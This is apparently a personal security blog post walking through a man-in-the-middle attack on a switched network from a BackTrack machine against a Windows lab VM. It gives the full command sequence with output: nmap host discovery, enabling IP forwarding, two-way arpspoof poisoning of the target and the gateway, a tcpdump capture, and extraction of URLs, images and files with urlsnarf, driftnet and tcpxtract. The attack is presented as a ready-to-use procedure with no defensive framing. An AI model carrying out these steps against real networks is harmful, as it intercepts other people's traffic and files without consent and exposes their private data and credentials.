We all know the difference between a hub & a switch (if not, this is not the blog for you). As most networks these days will be switched, its no longer a case of plug in & dump packets. So here is the easy way to capture traffic from the network for investigation later. This works with wired or wireless. This is a combination of skillz in my SSLSTRIP post and the Image Extraction post.
Simply put, we use arpspoof to convince the gateway that we are the target, and the target that we are the gateway.
Target selection (our IP is 172.16.189.136, default gateway is 172.16.189.2)
root@bt:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:ab:b2:2c inet addr:172.16.189.136 Bcast:172.16.189.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:22 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3682 (3.6 KB) TX bytes:1753 (1.7 KB) Interrupt:19 Base address:0x2000 root@bt:~# netstat -nr Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 172.16.189.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 0.0.0.0 172.16.189.2 0.0.0.0 UG 0 0 0 eth0 root@bt:~# nmap -sP 172.16.189.1-255 Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-17 21:10 EST Nmap scan report for 172.16.189.1 Host is up (0.00018s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 172.16.189.2 Host is up (0.0015s latency). MAC Address: 00:50:56:E5:F7:F0 (VMware) Nmap scan report for 172.16.189.135 Host is up (0.00076s latency). MAC Address: 00:0C:29:09:04:71 (VMware) Nmap scan report for 172.16.189.136 Host is up. Nmap scan report for 172.16.189.254 Host is up (0.00050s latency). MAC Address: 00:50:56:F8:EC:20 (VMware) Nmap done: 255 IP addresses (5 hosts up) scanned in 4.36 seconds root@bt:~#
So we have a couple of other hosts there, we will use 172.16.189.135.
We want to get traffic from 172.16.189.135 to the gateway (internet) sent to us, and traffic from the gateway back to 172.16.189.135 also sent to us, we do that with the following arpspoof commands.
Windows host before arpspoof:
C:\Documents and Settings\Administrator>arp -a Interface: 172.16.189.135 --- 0x2 Internet Address Physical Address Type 172.16.189.2 00-50-56-e5-f7-f0 dynamic
arpspoof commands to run on our backtrack box, not forgetting to enable ip forwarding
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward root@bt:~# arpspoof -i eth0 -t 172.16.189.135 172.16.189.2 0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c 0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c root@bt:~# arpspoof -i eth0 -t 172.16.189.2 172.16.189.135 0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c 0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c
and our windows box ?
C:\Documents and Settings\Administrator>arp -a Interface: 172.16.189.135 --- 0x2 Internet Address Physical Address Type 172.16.189.2 00-0c-29-ab-b2-2c dynamic 172.16.189.136 00-0c-29-ab-b2-2c dynamic
and of course, kick off your tcpdump session (without the arpspoof traffic)
root@bt:~# tcpdump -s0 -i eth0 not arp -w eth0capture tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
so, we have a shiny new file, full of data goodness – what to do with it. There are several ways you can look at the data:
urlsnarf – prints http requests
driftnet – extracts files from capture
tcpxtract – another extractor from captures **Needs installation, but it got me the best results**
Setup the apps to listen on the local interface in separate windows, then feed your packets into that interface with tcpreplay.
root@bt:~# urlsnarf -i lo urlsnarf: listening on lo [tcp port 80 or port 8080 or port 3128] root@bt:~# driftnet -i lo driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-0.jpeg' driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-1.jpeg' root@bt:~# tcpreplay -i lo eth0capture-s0 sending out lo processing file: eth0capture-s0 Actual: 18412 packets (15604605 bytes) sent in 105.88 seconds Rated: 148490.3 bps, 1.13 Mbps/sec, 175.20 pps Statistics for network device: lo Attempted packets: 18412 Successful packets: 18412 Failed packets: 0 Retried packets (ENOBUFS): 0 Retried packets (EAGAIN): 0 root@bt:~# apt-get install tcpxtract root@bt:~# mkdir tcpxtract root@bt:~# tcpxtract -f eth0capture-s0 -o tcpxtract/ Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000000.html Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000001.html
There we go, we extracted some info from the packet capture. Next time I will cover a much nicer util to get our files out of the capture file.